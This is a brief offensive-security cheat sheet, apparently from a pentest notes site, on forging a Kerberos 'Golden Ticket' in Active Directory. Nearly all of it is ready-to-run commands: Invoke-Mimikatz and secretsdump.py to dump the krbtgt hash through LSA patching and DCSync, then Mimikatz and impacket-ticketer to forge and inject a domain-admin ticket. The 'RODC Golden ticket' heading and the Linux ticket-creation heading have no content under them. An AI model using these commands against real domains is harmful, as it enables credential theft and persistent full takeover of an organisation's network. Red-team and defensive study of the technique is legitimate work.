Golden Ticket
Golden Ticket
1) Retrieve the krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcInvoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'2) Create TGT
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_SID> /krbtgt:<krbtgt_hash> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
impacket-ticketer -aesKey KRBTGT_AES_KEY -domain-sid DOMAIN_SID -domain DOMAIN ANY_USER
mimikatz "kerberos::golden /user:ADMIN_USER /domain:DOMAIN /sid:DOMAIN-SID /aes256:KRBTGT_AES256 /ptt"Linux
1) Dump krbtgt has with DCSync
secretsdump.py -just-dc-user 'krbtgt' -just-dc-ntlm domain.local/administrator:password@<DC>2) Create TGT
RODC Golden ticket
Last updated